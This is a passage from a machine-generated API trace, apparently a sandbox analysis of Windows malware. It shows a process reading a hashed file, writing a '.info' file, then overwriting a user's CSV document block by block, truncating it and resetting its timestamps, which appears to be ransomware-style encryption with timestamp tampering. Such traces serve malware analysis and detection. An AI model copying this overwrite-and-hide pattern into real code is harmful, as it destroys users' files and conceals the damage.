HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", lpFilePart=0x0) returned 0x51 [0076.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\7ad2170da0a9aa4cf2545f926e74de40"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.836] GetFileType (hFile=0x36c) returned 0x1 [0076.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.836] GetFileType (hFile=0x36c) returned 0x1 [0076.836] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.837] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.838] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.839] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.840] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.840] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.840] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.840] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.841] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.842] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.842] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.842] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.842] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.842] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.842] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x1b0, lpOverlapped=0x0) returned 1 [0076.842] ReadFile (in: hFile=0x36c, lpBuffer=0x22ecf98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ecf98*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40.info", lpFilePart=0x0) returned 0x56 [0076.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\7ad2170da0a9aa4cf2545f926e74de40.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.844] GetFileType (hFile=0x36c) returned 0x1 [0076.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.844] GetFileType (hFile=0x36c) returned 0x1 [0076.844] WriteFile (in: hFile=0x36c, lpBuffer=0x22f9658*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x22f9658*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.849] CloseHandle (hObject=0x36c) returned 1 [0076.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa453810, ftCreationTime.dwHighDateTime=0x1d4d48b, ftLastAccessTime.dwLowDateTime=0xce8ca390, ftLastAccessTime.dwHighDateTime=0x1d4cf25, ftLastWriteTime.dwLowDateTime=0xce8ca390, ftLastWriteTime.dwHighDateTime=0x1d4cf25, nFileSizeHigh=0x0, nFileSizeLow=0x161ad)) returned 1 [0076.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.851] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", dwFileAttributes=0x80) returned 1 [0076.851] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.851] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv"), fInfoLevelId=0x0, lpFileInformation=0x2301270 | out: lpFileInformation=0x2301270*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfa453810, ftCreationTime.dwHighDateTime=0x1d4d48b, ftLastAccessTime.dwLowDateTime=0xce8ca390, ftLastAccessTime.dwHighDateTime=0x1d4cf25, ftLastWriteTime.dwLowDateTime=0xce8ca390, ftLastWriteTime.dwHighDateTime=0x1d4cf25, nFileSizeHigh=0x0, nFileSizeLow=0x161ad)) returned 1 [0076.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.851] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.851] GetFileType (hFile=0x36c) returned 0x1 [0076.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.851] GetFileType (hFile=0x36c) returned 0x1 [0076.851] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.852] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.853] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.854] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.854] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.855] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.856] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.856] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.857] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.858] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.858] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.859] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.860] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.860] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.861] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.862] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.863] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.863] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.864] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.865] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.865] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.866] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.867] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.867] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x200, lpOverlapped=0x0) returned 1 [0076.867] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.868] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.868] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.869] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.870] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.870] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.871] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.872] WriteFile (in: hFile=0x36c, lpBuffer=0x2301738*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2301738*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.874] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.874] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.875] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.875] SetEndOfFile (hFile=0x36c) returned 1 [0076.876] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.876] CloseHandle (hObject=0x36c) returned 1 [0076.876] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.876] GetFileType (hFile=0x36c) returned 0x1 [0076.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.877] GetFileType (hFile=0x36c) returned 0x1 [0076.877] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.877] CloseHandle (hObject=0x36c) returned 1 [0076.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.877] GetFileType (hFile=0x36c) returned 0x1 [0076.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.877] GetFileType (hFile=0x36c) returned 0x1 [0076.877] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.877] CloseHandle (hObject=0x36c) returned 1 [0076.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.878] GetFileType (hFile=0x36c) returned 0x1 [0076.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.878] GetFileType (hFile=0x36c) returned 0x1 [0076.878] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.878] CloseHandle (hObject=0x36c) returned 1 [0076.878] 